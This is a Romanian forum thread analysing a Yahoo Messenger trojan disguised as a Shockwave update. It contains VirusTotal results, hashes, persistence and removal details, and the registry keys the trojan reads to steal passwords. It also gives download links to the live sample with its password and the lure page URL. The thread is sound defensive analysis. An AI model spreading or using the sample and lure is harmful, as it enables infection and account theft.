Inca un virus yahoo

[begood]

hotel regim hotelier

hotel yahoo domain

Se da drept un update de Adobe Shockwave player.
Cloud Antivirus l-a detectat imediat.

analiza virustotal :

Code:

http://www.virustotal.com/analisis/c085bc9738dca68a0242683ac0a825440af09f4a08fe74a441e0f8efefb313c5-1265013900

Code:

 File setup.exe received on 2010.02.01 08:45:00 (UTC)
Current status: finished
Result: 23/40 (57.50%)
Compact Compact
Print results Print results
Antivirus 	Version 	Last Update 	Result
a-squared 	4.5.0.50 	2010.02.01 	Dialer!IK
AhnLab-V3 	5.0.0.2 	2010.01.31 	Win-Trojan/Mdshell.3016192
AntiVir 	7.9.1.154 	2010.01.31 	DIAL/Generic
Antiy-AVL 	2.0.3.7 	2010.02.01 	-
Authentium 	5.2.0.5 	2010.01.31 	W32/Trojan-Gypikon-based.DE!Maximus
Avast 	4.8.1351.0 	2010.01.31 	Win32:Malware-gen
AVG 	9.0.0.730 	2010.01.31 	-
BitDefender 	7.2 	2010.02.01 	Win32.Worm.IM.J
CAT-QuickHeal 	10.00 	2010.02.01 	-
ClamAV 	0.96.0.0-git 	2010.02.01 	-
Comodo 	3780 	2010.02.01 	Heur.Suspicious
DrWeb 	5.0.1.12222 	2010.02.01 	-
eSafe 	7.0.17.0 	2010.01.31 	Win32.DIALGeneric
eTrust-Vet 	35.2.7274 	2010.02.01 	Win32/Tnega.ADE
F-Prot 	4.5.1.85 	2010.01.31 	W32/Trojan-Gypikon-based.DE!Maximus
F-Secure 	9.0.15370.0 	2010.01.31 	Win32.Worm.IM.J
Fortinet 	4.0.14.0 	2010.02.01 	W32/Delf.TUP!tr
GData 	19 	2010.02.01 	Win32.Worm.IM.J
Ikarus 	T3.1.1.80.0 	2010.02.01 	Dialer
Jiangmin 	13.0.900 	2010.01.28 	-
K7AntiVirus 	7.10.960 	2010.01.29 	-
Kaspersky 	7.0.0.125 	2010.02.01 	Trojan.Win32.Agent2.cnkw
McAfee 	5878 	2010.01.31 	Generic.dx!mgr
McAfee+Artemis 	5878 	2010.01.31 	Artemis!FA8305E3E69B
McAfee-GW-Edition 	6.8.5 	2010.02.01 	Dialer.Generic
Microsoft 	1.5406 	2010.02.01 	-
NOD32 	4823 	2010.02.01 	-
Norman 	6.04.03 	2010.01.31 	-
nProtect 	2009.1.8.0 	2010.02.01 	-
Panda 	10.0.2.2 	2010.01.31 	Trj/CI.A
PCTools 	7.0.3.5 	2010.02.01 	Trojan-PSW.Bancos
Rising 	22.33.00.04 	2010.02.01 	-
Sophos 	4.50.0 	2010.02.01 	Mal/Generic-A
Sunbelt 	3.2.1858.2 	2010.01.31 	Trojan.Win32.Generic!BT
Symantec 	20091.2.0.41 	2010.02.01 	Infostealer.Bancos
TheHacker 	6.5.1.0.175 	2010.02.01 	-
TrendMicro 	9.120.0.1004 	2010.02.01 	-
VBA32 	3.12.12.1 	2010.01.29 	-
ViRobot 	2010.2.1.2165 	2010.02.01 	-
VirusBuster 	5.0.21.0 	2010.01.31 	-
Additional information
File size: 3016192 bytes
MD5   : fa8305e3e69b27a7b95dcf2cec0fcb9f
SHA1  : a4552f2899871702f83969ba01ce50228ab8c6fd
SHA256: c085bc9738dca68a0242683ac0a825440af09f4a08fe74a441e0f8efefb313c5

pagina de download originala :

Code:

http://dl.fisier.ro/files/dh5kgfingf335je/setup.exe.html

mirror :

Code:

http://www.2shared.com/file/11045927/5afa1303/setup_virus.html

pass :

Code:

begood@rstcenter.com

pagina de pe care o primesti prin yahoo IM:

Code:

http://roamateursxx.freehostking.com/profile.php?user=[ID-ul tau]

mirror la pagina asta :

Code:

http://www.2shared.com/file/11045982/d07f0f06/virus_downloadpage.html

aceeasi parola.

mesajul pe care l-am primit prin Y! im :
tu ti-ai facut profilu asta? [Doar userii inregistrati pot vedea linkurile. ]

LE: Imi place cum au gandit atacatorii.
Trimit link cu un profil porno care nu este afisat corect la victima. Din cauza ca o afecteaza direct (id-ul victimei fiind in link), trebuie sa-si instaleze update-ul acela pentru a-si vedea propriu profil. Voila, nou trojan instalat.

[Nytro]

Thanks.

Virusul se copiaza in Windows/system32/cgsb.exe si se pune la startup in ( HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ). Iconita e de Internet Explorer.

Ca sa scapati de el stergeti acel fisier. Ciudat, ls startup, locatia de executare apare cu o virgula inainte.

La rulare arata un ProgressBar urat, si la sfarsit da eroare: "Unable to Register ActiveX...".

Cred ca foloseste OpenSSL, copiaza in system32 libeay32.dll si ssleay32.dll. Nu sunt sigur. Cred ca acel "setup" care probabil e un binder scris in Delphi, contine 5 fisiere. Mai copiaza si YahooAuth2.dll ( Bricksoft nu Yahoo! la Company Name, ciudat ). Si cred ca ar mai fi MSIMTF.DLL ( Microsoft ).

EDIT: La a doua rulare, s-a copiat sub numele de xdbyqdn.exe. Asta inseamna ca numele e aleator, sau poate avea un anumit numar de nume posibile.

CA SA SCAPATI DE EL: Intrati in Windows\system32 si stergeti executabilul/executabilele cu iconita de INTERNET EXPLORER ( 6 ).

Revin cu mai multe detalii.

[ROFL]

Era bine de stiut cum trimite mesajele catre contactele din lista.

[Flubber]

"citind de lup"

Quote:

x (2/1/2010 2:30:58 PM): Georgiana: tu ti-ai facut profilu asta? hxxp://roamateursxx.freehostking.com/profile.php?user=id lui
x: ce ai zis ca ma pacalesti
x: si instalez ala nu ?
x: )


Hide Recent Messages (F3)

You currently appear offline to Georgiana.

x: si 2 vezi ca nu e frumos ce faci
x: dupa te miri dc te bate lumea )
x (2/1/2010 2:31:06 PM): mai are rost sa`i zic si ca are creieru mic ?
Flubber (2/1/2010 2:31:11 PM): [Doar userii inregistrati pot vedea linkurile. ]
Flubber (2/1/2010 2:31:13 PM): tocmai ce citeam

[begood]

[Doar userii inregistrati pot vedea linkurile. ]

bagati mare aici.
asta : [Doar userii inregistrati pot vedea linkurile. ]

LE: analiza anubis:
[Doar userii inregistrati pot vedea linkurile. ]

Nytro, ai omis ca face si al patrulea fisier :
C:\WINDOWS\system32\YahooAuth2.dll
C:\WINDOWS\system32\libeay32.dll
C:\WINDOWS\system32\ssleay32.dll
C:\WINDOWS\system32\tqsbsf.exe

[Doar userii inregistrati pot vedea linkurile. ]

deci are si keylogger si stealer
grija mare pt cititori !

[Nytro]

Citeste:

HKCU\Software\Yahoo\pager\Yahoo! User ID
HKCU\Software\Yahoo\pager\ETS
HKCU\Software\Yahoo\pager\Save Password

Fura parola de messenger. Copiaza ID-ul si parola in:

HKLM\SOFTWARE\first\USER
HKLM\SOFTWARE\first\PAROLA

E prost scris, citeste Yahoo! User ID de ii sar capacele... Citeste la el pana e completat. Datele le citeste ca un keylogger, in functie de cum sunt apasate, probabil verifica fereastra activa.

Sa vad ce mai pot afla...

[tdxev]

Probabil alta versiune.. se copiaza sub numele("efoqj.exe")
Am injurat o jumatate de zi la una acum 4 zile cand l-am primit ) am crezut ca este trojan,
dupa aceea am vazut ca a mai trimis iar acelasi mesaj si mi-am dat seama ca nu are de a face...

link-ul primit... prima data a doua zi nu mai era bun,
[Doar userii inregistrati pot vedea linkurile. ]

link-ul catre fisierul executabil... inca este bun (nu am avut chef sa raportez pagina pe [Doar userii inregistrati pot vedea linkurile. ] daca vreti...)
[Doar userii inregistrati pot vedea linkurile. ]

Virus Total
[Doar userii inregistrati pot vedea linkurile. ]

Anubius
[Doar userii inregistrati pot vedea linkurile. ]

System Snapshots dupa rularea update.exe:

Code:

Dir	Added	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\PresentationCore
Dir	Added	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\PresentationCore\dbfa432eec6dd6c069fc11ce09a967e6
File	Added	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\PresentationCore\dbfa432eec6dd6c069fc11ce09a967e6\PresentationCore.ni.dll
Dir	Added	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAP2.tmp
File	Added	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\index5f.dat
File	Added	C:\WINDOWS\system32\YahooAuth2.dll
File	Added	C:\WINDOWS\system32\efoqj.exe
File	Added	C:\WINDOWS\system32\libeay32.dll
File	Added	C:\WINDOWS\system32\ssleay32.dll
File	Changed	C:\Documents and Settings\LocalService\Cookies\index.dat	"Modified=1/27/2010 4:04:52 PM"	(old value="Modified=1/27/2010 4:03:04 PM")
File	Changed	C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat	"Modified=1/27/2010 4:04:52 PM"	(old value="Modified=1/27/2010 4:03:04 PM")
File	Changed	C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat	"Modified=1/27/2010 4:04:52 PM"	(old value="Modified=1/27/2010 4:03:19 PM")
File	Changed	C:\Documents and Settings\LocalService\ntuser.dat.LOG	"Modified=1/27/2010 4:05:05 PM"	(old value="Modified=1/27/2010 4:04:14 PM")
File	Changed	C:\Documents and Settings\NetworkService\ntuser.dat.LOG	"Modified=1/27/2010 4:05:06 PM"	(old value="Modified=1/27/2010 4:04:16 PM")
File	Changed	C:\Program Files\Alwil Software\Avast4\Setup\setup.ini	"Modified=1/27/2010 4:04:53 PM"	(old value="Modified=1/27/2010 4:04:21 PM")
File	Changed	C:\Program Files\Alwil Software\Avast4\Setup\summary.txt	"Size=157 Modified=1/27/2010 4:04:53 PM"	(old value="Size=237 Modified=1/27/2010 3:49:39 PM")
File	Changed	C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ngen_service.log	"Size=442046 Modified=1/27/2010 4:05:53 PM"	(old value="Size=435936 Modified=1/27/2010 4:03:31 PM")
File	Changed	C:\WINDOWS\system32\config\default.LOG	"Modified=1/27/2010 4:05:59 PM"	(old value="Modified=1/27/2010 4:05:07 PM")
File	Changed	C:\WINDOWS\system32\config\system.LOG	"Size=1024 Modified=1/27/2010 4:05:29 PM"	(old value="Size=24576 Modified=1/27/2010 4:05:17 PM")
File	Changed	C:\WINDOWS\WindowsUpdate.log	"Size=937698"	(old value="Size=935860")
Dir	Deleted	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Temp\ZAP1.tmp
File	Deleted	C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\index5d.dat
Reg Val	Added	HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Nqzvavfgengbe\Qrfxgbc\hcqngr.rkr	BINARY SIZE=16 MD5=831F4D7C8AA6E01F622E4B4300A2E494
Reg Val	Added	HKCU\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer	winspool,Ne00:
Reg Val	Added	HKCU\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer	winspool,Ne00:,15,45
Reg Val	Added	HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Device	Microsoft XPS Document Writer,winspool,Ne00:
Reg Val	Added	HKLM\SOFTWARE\ALWIL Software\Avast\4.0\UpdateReady	1
Reg Val	Added	HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\PresentationFramework, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35\1\ImageList	BINARY SIZE=3502 MD5=8088935202887196057F50A0851E9313
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\6\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\2\InvertDependencies\55d78379\49814236\4	
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\DisplayName	System.Deployment,2.0.0.0,,b03f5f7f11d50a3a
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\LastModTime	BINARY SIZE=8 MD5=A5280890AF1017799761D91B8E6A6EBB
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\SIG	BINARY SIZE=36 MD5=94D1851D7E28900126DB8779282312C1
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\7f729234\e\Status	4098
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\DisplayName	Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\LastModTime	BINARY SIZE=8 MD5=F76C0889743D62F71A63DD879DD0ADB9
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\SIG	BINARY SIZE=36 MD5=189761152A9743F76DB0255A470C012F
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\6890fab6\d\Status	4098
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\DisplayName	UIAutomationTypes,3.0.0.0,,31bf3856ad364e35
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\LastModTime	BINARY SIZE=8 MD5=AE63CB6E17BE04A15BD69C7ABF9CE64C
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\SIG	BINARY SIZE=36 MD5=034C2155150CE918AC8C879A620302EB
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\Status	4098
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\DisplayName	UIAutomationProvider,3.0.0.0,,31bf3856ad364e35
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\LastModTime	BINARY SIZE=8 MD5=C0865EF9202DC6E0B357A24EC9D3384B
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\SIG	BINARY SIZE=36 MD5=D39E4981EB46562754648F8CB00691DF
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\Status	4098
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\DisplayName	System.Drawing,2.0.0.0,,b03f5f7f11d50a3a
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\LastModTime	BINARY SIZE=8 MD5=D2B3E6E21DF7D6BCAAA67646CF6276B9
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\SIG	BINARY SIZE=36 MD5=0A86BF52F8B4C8838B5457994402CE08
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\Status	4098
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\DisplayName	PresentationCFFRasterizer,3.0.0.0,,31bf3856ad364e35
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\LastModTime	BINARY SIZE=8 MD5=46DA9424A7E4313575998816161B9346
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\SIG	BINARY SIZE=36 MD5=0224578AFEFC3663122D3FA2BC397084
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f3aad1e\47609cba\f\Status	4098
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\8\InvertDependencies\55d78379\49814236\4	
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\7\InvertDependencies\55d78379\49814236\4	
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d67735\6a8e4b71\5\InvertDependencies
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d67735\6a8e4b71\5\InvertDependencies\55d78379\49814236\4	
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\ConfigMask	4361
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\ConfigString	ZAP--0000-0000
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\DisplayName	PresentationCore,3.0.0.0,,31bf3856ad364e35
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\ILDependencies	BINARY SIZE=160 MD5=096A31B6B5C8CFB799B56EC4700361F3
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\MVID	BINARY SIZE=16 MD5=12B7A2D559DB2AE18514B850EBF54743
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\NIDependencies	BINARY SIZE=60 MD5=3EB20EA66E26A96605A6B15592EC6093
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\55d78379\49814236\4\Status	0
Reg Key	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f\ILUsageMask	BINARY SIZE=2 MD5=B08B7C15585E653ED9D7F4A0A186496F
Reg Val	Added	HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f\NIUsageMask	BINARY SIZE=1 MD5=31741635B41D535098241FEA03C1E47F
Reg Key	Added	HKLM\SOFTWARE\last
Reg Val	Added	HKLM\SOFTWARE\last\Parola	
Reg Val	Added	HKLM\SOFTWARE\last\USER	
Reg Key	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\DefaultSpoolDirectory	C:\WINDOWS\System32\spool\PRINTERS
Reg Key	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Action	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Attributes	64
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\ChangeID	2664406
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Datatype	RAW
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Default DevMode	BINARY SIZE=1076 MD5=F5025FF677063E1E5B2AA5E432BF1C0D
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Default Priority	1
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\Description	
Reg Key	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\driverVersion	1025
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printBinNames	Automatically Select
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printCollate	BINARY SIZE=1 MD5=93B885ADFE0DA089CDF634904FD59F71
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printColor	BINARY SIZE=1 MD5=55A54008AD1BA589AA210D2629C1DF41
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printDuplexSupported	BINARY SIZE=1 MD5=93B885ADFE0DA089CDF634904FD59F71
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printLanguage	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMaxResolutionSupported	600
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMaxXExtent	8636
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMaxYExtent	11176
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMediaReady	Letter
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMediaSupported	Letter
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMinXExtent	900
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printMinYExtent	900
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printNumberUp	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printOrientationsSupported	PORTRAIT
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printRateUnit	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsDriver\printStaplingSupported	BINARY SIZE=1 MD5=93B885ADFE0DA089CDF634904FD59F71
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsKeyUpdate	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsKeyUpdateForeground	3
Reg Key	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\description	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\driverName	Microsoft XPS Document Writer
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\flags	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\location	
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\portName	XPSPort:
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printEndTime	0
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printKeepPrintedJobs	BINARY SIZE=1 MD5=93B885ADFE0DA089CDF634904FD59F71
Reg Val	Added	HKLM\SYSTEM\CurrentControlSet\Control\Print\Printers\Microsoft XPS Document Writer\DsSpooler\printSeparatorFile	
